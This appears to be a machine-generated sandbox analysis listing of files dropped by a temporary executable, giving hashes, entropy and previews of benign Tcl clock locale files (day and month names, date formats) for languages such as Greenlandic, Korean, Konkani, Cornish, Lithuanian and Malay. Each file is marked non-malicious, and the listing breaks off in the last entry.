                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.013253613061898
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu83jGeo9sbjCjS3jCwjLj+zSsS9CfzTA2Qcl:46OOsJzTvl
                                                                                                                                                                                                                                                                                                                                MD5:AE55E001BBE3272CE13369C836139EF3
                                                                                                                                                                                                                                                                                                                                SHA1:D912A0AEBA08BC97D80E9B7A55CE146956C90BCC
                                                                                                                                                                                                                                                                                                                                SHA-256:1B00229DF5A979A040339BBC72D448F39968FEE5CC24F07241C9F6129A9B53DD
                                                                                                                                                                                                                                                                                                                                SHA-512:E53E8DB56AD367E832A121D637CA4755E6C8768C063E4BE43E6193C5F71ED7AA10F7223AC85750C0CAD543CF4A0BFE578CBA2877F176A5E58DCA2BAA2F7177FB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kl DAYS_OF_WEEK_ABBREV [list \. "sab"\. "ata"\. "mar"\. "pin"\. "sis"\. "tal"\. "arf"]. ::msgcat::mcset kl DAYS_OF_WEEK_FULL [list \. "sabaat"\. "ataasinngorneq"\. "marlunngorneq"\. "pingasunngorneq"\. "sisamanngorneq"\. "tallimanngorneq"\. "arfininngorneq"]. ::msgcat::mcset kl MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset kl MONTHS_FULL [list \. "januari"\. "februari"\. "martsi"\. "aprili"\. "maji"\. "juni"\. "juli"\. "augustusi"\. "septemberi"\. "oktoberi"\. "novemberi"\. "decemberi"\. ""].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.83493357349932
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoEpb53FD/LoEpLE3vG5oEpLE3v6X5oEpba+3vnFDoAov:4EnLzu8KF3FD/1w3vMw3v6T/3v9dy
                                                                                                                                                                                                                                                                                                                                MD5:4B8E5B6EB7C27A02DBC0C766479B068D
                                                                                                                                                                                                                                                                                                                                SHA1:E97A948FFE6C8DE99F91987155DF0A81A630950E
                                                                                                                                                                                                                                                                                                                                SHA-256:F99DA45138A8AEBFD92747FC28992F0C315C6C4AD97710EAF9427263BFFA139C
                                                                                                                                                                                                                                                                                                                                SHA-512:D726494A6F4E1FB8C71B8B56E9B735C1837D8D22828D006EF386E41AD15CD1E4CF14DAC01966B9AFE41F7B6A44916EFC730CF038B4EC393043AE9021D11DACF2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kl_GL DATE_FORMAT "%d %b %Y". ::msgcat::mcset kl_GL TIME_FORMAT "%T". ::msgcat::mcset kl_GL TIME_FORMAT_12 "%T". ::msgcat::mcset kl_GL DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1566
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.552910804130986
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8cVBfHVnYgY+YGkYeY02Y7YkMXjDHMXjqKKyvtuvFd8vUPvwEq:46ojlmpYEY7XjDsXj+0t4zaU3wt
                                                                                                                                                                                                                                                                                                                                MD5:A4C37AF81FC4AA6003226A95539546C1
                                                                                                                                                                                                                                                                                                                                SHA1:A18A7361783896C691BD5BE8B3A1FCCCCB015F43
                                                                                                                                                                                                                                                                                                                                SHA-256:F6E2B0D116D2C9AC90DDA430B6892371D87A4ECFB6955318978ED6F6E9D546A6
                                                                                                                                                                                                                                                                                                                                SHA-512:FBE6BA258C250BD90FADCC42AC18A17CC4E7B040F160B94075AF1F42ECD43EEA6FE49DA52CF9B5BBB5D965D6AB7C4CC4053A78E865241F891E13F94EB20F0472
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ko DAYS_OF_WEEK_ABBREV [list \. "\uc77c"\. "\uc6d4"\. "\ud654"\. "\uc218"\. "\ubaa9"\. "\uae08"\. "\ud1a0"]. ::msgcat::mcset ko DAYS_OF_WEEK_FULL [list \. "\uc77c\uc694\uc77c"\. "\uc6d4\uc694\uc77c"\. "\ud654\uc694\uc77c"\. "\uc218\uc694\uc77c"\. "\ubaa9\uc694\uc77c"\. "\uae08\uc694\uc77c"\. "\ud1a0\uc694\uc77c"]. ::msgcat::mcset ko MONTHS_ABBREV [list \. "1\uc6d4"\. "2\uc6d4"\. "3\uc6d4"\. "4\uc6d4"\. "5\uc6d4"\. "6\uc6d4"\. "7\uc6d4"\. "8\uc6d4"\. "9\uc6d4"\. "10\uc6d4"\. "11\uc6d4"\. "12\uc6d4"\. ""]. ::msgcat::mcset ko MONTHS_FULL [list \. "1\uc6d4"\. "2\uc6d4"\. "3\uc6d4"\. "4\uc6d4"\. "5\uc6d4"\. "6\uc6d4"\. "7\uc6d4"\. "8\uc6d4"\.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):346
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.015790750376121
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmo56SFZhjNo56m5Ybo56TGMZo56a/W3v6mfvLo56TT+3vOAEP:4EnLzu8r62vjs6m5YS6TGN6a+3v6o66J
                                                                                                                                                                                                                                                                                                                                MD5:9C7E97A55A957AB1D1B5E988AA514724
                                                                                                                                                                                                                                                                                                                                SHA1:592F8FF9FABBC7BF48539AF748DCFC9241AED82D
                                                                                                                                                                                                                                                                                                                                SHA-256:31A4B74F51C584354907251C55FE5CE894D2C9618156A1DC6F5A979BC350DB17
                                                                                                                                                                                                                                                                                                                                SHA-512:9D04DF2A87AFE24C339E1A0F6358FE995CBCAF8C7B08A1A7953675E2C2C1EDBCAF297B23C2B9BEC398DFEE6D1D75CE32E31389A7199466A38BC83C8DBBA67C77
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ko_KR BCE "\uae30\uc6d0\uc804". ::msgcat::mcset ko_KR CE "\uc11c\uae30". ::msgcat::mcset ko_KR DATE_FORMAT "%Y.%m.%d". ::msgcat::mcset ko_KR TIME_FORMAT_12 "%P %l:%M:%S". ::msgcat::mcset ko_KR DATE_TIME_FORMAT "%Y.%m.%d %P %l:%M:%S %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1958
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1451019501109965
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8Z448VcOVczWdSVcqVcR0q4vTqBBiXCVcqVcR0q4vTqBBiaMv:46u48h0qpBBaR0qpBBVu
                                                                                                                                                                                                                                                                                                                                MD5:E7938CB3AF53D42B4142CB104AB04B3B
                                                                                                                                                                                                                                                                                                                                SHA1:6205BD2336857F368CABF89647F54D94E093A77B
                                                                                                                                                                                                                                                                                                                                SHA-256:D236D5B27184B1E813E686D901418117F22D67024E6944018FC4B633DF9FF744
                                                                                                                                                                                                                                                                                                                                SHA-512:CE77CE2EC773F3A1A3CD68589C26F7089E8133ADE601CE899EEB0B13648051344A94E69AEC2C8C58349456E52B11EB7545C8926E3F08DB643EE551C641FF38DB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kok DAYS_OF_WEEK_FULL [list \. "\u0906\u0926\u093f\u0924\u094d\u092f\u0935\u093e\u0930"\. "\u0938\u094b\u092e\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0933\u093e\u0930"\. "\u092c\u0941\u0927\u0935\u093e\u0930"\. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\. "\u0936\u0928\u093f\u0935\u093e\u0930"]. ::msgcat::mcset kok MONTHS_ABBREV [list \. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\. "\u092e\u093e\u0930\u094d\u091a"\. "\u090f\u092a\u094d\u0930\u093f\u0932"\. "\u092e\u0947"\. "\u091c\u0942\u0928"\. "\u091c\u0941\u0932\u0948"\. "\u0913\u0917\u0938\u094d\u091f"\. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\. "\u0913\u0915\u094d\u091f\u094b\u092c\u0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8580653411441155
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmo5VsNv+9/Lo5VsU3v6rZo5VsNo+3v+6f6HK:4EnLzu8rVsNvWiVsU3v6rAVsNF3vmq
                                                                                                                                                                                                                                                                                                                                MD5:A3B27D44ED430AEC7DF2A47C19659CC4
                                                                                                                                                                                                                                                                                                                                SHA1:700E4B9C395B540BFCE9ABDC81E6B9B758893DC9
                                                                                                                                                                                                                                                                                                                                SHA-256:BEE07F14C7F4FC93B62AC318F89D2ED0DD6FF30D2BF21C2874654FF0292A6C4B
                                                                                                                                                                                                                                                                                                                                SHA-512:79E9D8B817BDB6594A7C95991B2F6D7571D1C2976E74520D28223CF9F05EAA2128A44BC83A94089F09011FFCA9DB5E2D4DD74B59DE2BADC022E1571C595FE36C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kok_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset kok_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset kok_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):966
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9734955453120504
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu8z4md0eKwCW44mtls79cp32AqghoPx9ab43gWgw3SeWOdSyECYf5AQZ0eD:4azu806vCmgs7aB2seFkhq+9
                                                                                                                                                                                                                                                                                                                                MD5:413A264B40EEBEB28605481A3405D27D
                                                                                                                                                                                                                                                                                                                                SHA1:9C2EFA6326C62962DCD83BA8D16D89616D2C5B77
                                                                                                                                                                                                                                                                                                                                SHA-256:F49F4E1C7142BF7A82FC2B9FC075171AE45903FE69131478C15219D72BBAAD33
                                                                                                                                                                                                                                                                                                                                SHA-512:CF0559DB130B8070FEC93A64F5317A2C9CDE7D5EAFD1E92E76EAAE0740C6429B7AB7A60BD833CCA4ABCC0AADEBC6A68F854FF654E0707091023D275404172427
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kw DAYS_OF_WEEK_ABBREV [list \. "Sul"\. "Lun"\. "Mth"\. "Mhr"\. "Yow"\. "Gwe"\. "Sad"]. ::msgcat::mcset kw DAYS_OF_WEEK_FULL [list \. "De Sul"\. "De Lun"\. "De Merth"\. "De Merher"\. "De Yow"\. "De Gwener"\. "De Sadorn"]. ::msgcat::mcset kw MONTHS_ABBREV [list \. "Gen"\. "Whe"\. "Mer"\. "Ebr"\. "Me"\. "Evn"\. "Gor"\. "Est"\. "Gwn"\. "Hed"\. "Du"\. "Kev"\. ""]. ::msgcat::mcset kw MONTHS_FULL [list \. "Mys Genver"\. "Mys Whevrel"\. "Mys Merth"\. "Mys Ebrel"\. "Mys Me"\. "Mys Evan"\. "Mys Gortheren"\. "Mye Est"\. "Mys Gwyngala"\. "Mys Hedra"\. "Mys Du"\. "Mys Kevardhu"\. ""].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.914818138642697
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoh6AvvNLoh633v6aZoh6Ao+3vR6HK:4EnLzu8z6AvvN6633v6aY6AF3voq
                                                                                                                                                                                                                                                                                                                                MD5:D325ADCF1F81F40D7B5D9754AE0542F3
                                                                                                                                                                                                                                                                                                                                SHA1:7A6BCD6BE5F41F84B600DF355CB00ECB9B4AE8C0
                                                                                                                                                                                                                                                                                                                                SHA-256:7A8A539C8B990AEFFEA06188B98DC437FD2A6E89FF66483EF334994E73FD0EC9
                                                                                                                                                                                                                                                                                                                                SHA-512:A05BBB3F80784B9C8BBA3FE618FEE154EE40D240ED4CFF7CD6EEE3D97BC4F065EFF585583123F1FFD8ABA1A194EB353229E15ED5CD43759D4D356EC5BE8DCD73
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kw_GB DATE_FORMAT "%d %B %Y". ::msgcat::mcset kw_GB TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset kw_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1255
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4416408590245
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8FHYI4/+HYZoNPW43VvJZb3lSuRnixx/x5JfbiMQeTVYkG2CvRksvQ:46hHNHhu43VxZb3lSuRwxZ5VbiMQeTVL
                                                                                                                                                                                                                                                                                                                                MD5:73F0A9C360A90CB75C6DA7EF87EF512F
                                                                                                                                                                                                                                                                                                                                SHA1:582EB224C9715C8336B4D1FCE7DDEC0D89F5AD71
                                                                                                                                                                                                                                                                                                                                SHA-256:510D8EED3040B50AFAF6A3C85BC98847F1B4D5D8A685C5EC06ACC2491B890101
                                                                                                                                                                                                                                                                                                                                SHA-512:B5482C7448BFC44B05FCF7EB0642B0C7393F4438082A507A94C13F56F12A115A5CE7F0744518BB0B2FAF759D1AD7744B0BEDB98F563C2A4AB11BC4619D7CEA22
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset lt DAYS_OF_WEEK_ABBREV [list \. "Sk"\. "Pr"\. "An"\. "Tr"\. "Kt"\. "Pn"\. "\u0160t"]. ::msgcat::mcset lt DAYS_OF_WEEK_FULL [list \. "Sekmadienis"\. "Pirmadienis"\. "Antradienis"\. "Tre\u010diadienis"\. "Ketvirtadienis"\. "Penktadienis"\. "\u0160e\u0161tadienis"]. ::msgcat::mcset lt MONTHS_ABBREV [list \. "Sau"\. "Vas"\. "Kov"\. "Bal"\. "Geg"\. "Bir"\. "Lie"\. "Rgp"\. "Rgs"\. "Spa"\. "Lap"\. "Grd"\. ""]. ::msgcat::mcset lt MONTHS_FULL [list \. "Sausio"\. "Vasario"\. "Kovo"\. "Baland\u017eio"\. "Gegu\u017e\u0117s"\. "Bir\u017eelio"\. "Liepos"\. "Rugpj\u016b\u010dio"\. "Rugs\u0117jo"\. "Spalio"\. "Lapkri\u010dio"\. "G
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1219
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.39393801727056
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8lmZG0me3AEcGo49bJcpF9gT9PCbF5uld0vVcASAr8svJ5vk3:46TGAE8Q/PG5dv//Lk3
                                                                                                                                                                                                                                                                                                                                MD5:D5DEB8EFFE6298858F9D1B9FAD0EA525
                                                                                                                                                                                                                                                                                                                                SHA1:973DF40D0464BCE10EB5991806D9990B65AB0F82
                                                                                                                                                                                                                                                                                                                                SHA-256:FD95B38A3BEBD59468BDC2890BAC59DF31C352E17F2E77C82471E1CA89469802
                                                                                                                                                                                                                                                                                                                                SHA-512:F024E3D6D30E8E5C3316364A905C8CCAC87427BFC2EC10E72065F1DD114A112A61FDECDF1C4EC9C3D8BB9A54D18ED4AE9D57B07DA4AFFE480DE12F3D54BED928
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset lv DAYS_OF_WEEK_ABBREV [list \. "Sv"\. "P"\. "O"\. "T"\. "C"\. "Pk"\. "S"]. ::msgcat::mcset lv DAYS_OF_WEEK_FULL [list \. "sv\u0113tdiena"\. "pirmdiena"\. "otrdiena"\. "tre\u0161diena"\. "ceturdien"\. "piektdiena"\. "sestdiena"]. ::msgcat::mcset lv MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Maijs"\. "J\u016bn"\. "J\u016bl"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset lv MONTHS_FULL [list \. "janv\u0101ris"\. "febru\u0101ris"\. "marts"\. "apr\u012blis"\. "maijs"\. "j\u016bnijs"\. "j\u016blijs"\. "augusts"\. "septembris"\. "oktobris"\. "novembris"\. "decembris"\. ""]. ::msgcat
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2105
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.237536682442766
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46UcQdZnlcQfAQPWQEHKr9nGUeDjDpxpWQ1Q3QuQoQLX9TSQ2QIQPQHp7+8i:hNdR7cr9nMvXI0i7F89TSn1KX
                                                                                                                                                                                                                                                                                                                                MD5:CD589758D4F4B522781A10003D3E1791
                                                                                                                                                                                                                                                                                                                                SHA1:D953DD123D54B02BAF4B1AE0D36081CDFCA38444
                                                                                                                                                                                                                                                                                                                                SHA-256:F384DD88523147CEF42AA871D323FC4CBEE338FF67CC5C95AEC7940C0E531AE3
                                                                                                                                                                                                                                                                                                                                SHA-512:2EA1E71CD1E958F83277006343E85513D112CBB3C22CBFF29910CB1FC37F2389B3F1DCB2533EC59F9E642624869E5C61F289FDC010B55C6EECEF378F2D92DB0B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0435\u0434."\. "\u043f\u043e\u043d."\. "\u0432\u0442."\. "\u0441\u0440\u0435."\. "\u0447\u0435\u0442."\. "\u043f\u0435\u0442."\. "\u0441\u0430\u0431."]. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \. "\u043d\u0435\u0434\u0435\u043b\u0430"\. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\. "\u0441\u0440\u0435\u0434\u0430"\. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\. "\u043f\u0435\u0442\u043e\u043a"\. "\u0441\u0430\u0431\u043e\u0442\u0430"]. ::msgcat::mcset mk MONTHS_ABBREV [list \. "\u0458\u0430\u043d."\. "\u0444\u0435\u0432."\. "\u043c\u0430\u0440."\. "\u0430\u043f\u0440."\. "\u043c\u0430\u0458."\. "\u0458\u0443\u043d."\. "\u0458\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1807
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.160320823510059
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8ocYe48VcOVczyVczoRSVcqVcR0q4vTqBBiPNVcqVcR0q4vTqBBil:46R48h0qpBBkI0qpBBe
                                                                                                                                                                                                                                                                                                                                MD5:791408BAE710B77A27AD664EC3325E1C
                                                                                                                                                                                                                                                                                                                                SHA1:E760B143A854838E18FFB66500F4D312DD80634E
                                                                                                                                                                                                                                                                                                                                SHA-256:EB2E2B7A41854AF68CEF5881CF1FBF4D38E70D2FAB2C3F3CE5901AA5CC56FC15
                                                                                                                                                                                                                                                                                                                                SHA-512:FE91EF67AB9313909FE0C29D5FBE2298EE35969A26A63D94A406BFDA7BCF932F2211F94C0E3C1D718DBC2D1145283C768C23487EEB253249ACFE76E8D1F1D1E5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \. "\u0930\u0935\u093f\u0935\u093e\u0930"\. "\u0938\u094b\u092e\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\. "\u0936\u0928\u093f\u0935\u093e\u0930"]. ::msgcat::mcset mr MONTHS_ABBREV [list \. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\. "\u092e\u093e\u0930\u094d\u091a"\. "\u090f\u092a\u094d\u0930\u093f\u0932"\. "\u092e\u0947"\. "\u091c\u0942\u0928"\. "\u091c\u0941\u0932\u0948"\. "\u0913\u0917\u0938\u094d\u091f"\. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\. "\u0913\u0915\u094d\u091f\u094b\u092c\u0930"\.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.847742455062573
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoGNv+9/LoGU3v6rZoGNo+3v+6f6HK:4EnLzu8GvWe3v6r5F3vmq
                                                                                                                                                                                                                                                                                                                                MD5:899E845D33CAAFB6AD3B1F24B3F92843
                                                                                                                                                                                                                                                                                                                                SHA1:FC17A6742BF87E81BBD4D5CB7B4DCED0D4DD657B
                                                                                                                                                                                                                                                                                                                                SHA-256:F75A29BB323DB4354B0C759CB1C8C5A4FFC376DFFD74274CA60A36994816A75C
                                                                                                                                                                                                                                                                                                                                SHA-512:99D05FCE8A9C9BE06FDA8B54D4DE5497141F6373F470B2AB24C2D00B9C56031350F5DCDA2283A0E6F5B09FF21218FC3C7E2A6AB8ECC5BB020546FD62BDC8FF99
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):910
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9292866027924838
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu82mCBuvFYcEfmt1qWjefjESRsToOqrlHvFguSixTRs1OAfC67:4azu82nBuHEfKxjeby7cl9gbZUAfCc
                                                                                                                                                                                                                                                                                                                                MD5:441CC737D383D8213F64B62A5DBEEC3E
                                                                                                                                                                                                                                                                                                                                SHA1:34FBE99FB25A0DCA2FDA2C008AC8127BA2BC273B
                                                                                                                                                                                                                                                                                                                                SHA-256:831F611EE851A64BF1BA5F9A5441EC1D50722FA9F15B4227707FE1927F754DE4
                                                                                                                                                                                                                                                                                                                                SHA-512:0474B2127890F63814CD9E77D156B5E4FC45EB3C17A57719B672AC9E3A6EEA9934F0BE158F76808B34A11DA844AB900652C18E512830278DFED2666CD005FBE5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \. "Aha"\. "Isn"\. "Sei"\. "Rab"\. "Kha"\. "Jum"\. "Sab"]. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \. "Ahad"\. "Isnin"\. "Selasa"\. "Rahu"\. "Khamis"\. "Jumaat"\. "Sabtu"]. ::msgcat::mcset ms MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mac"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Ogos"\. "Sep"\. "Okt"\. "Nov"\. "Dis"\. ""]. ::msgcat::mcset ms MONTHS_FULL [list \. "Januari"\. "Februari"\. "Mac"\. "April"\. "Mei"\. "Jun"\. "Julai"\. "Ogos"\. "September"\. "Oktober"\. "November"\. "Disember"\. ""].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):259
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.770028367699931
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoChFflD/LoChF+3v6xH5oCh++3vflm6PYv:4EnLzu8IPflD/ne3v6Tl3vflm6q
                                                                                                                                                                                                                                                                                                                                MD5:8261689A45FB754158B10B044BDC4965
                                                                                                                                                                                                                                                                                                                                SHA1:6FFC9B16A0600D9BC457322F1316BC175309C6CA
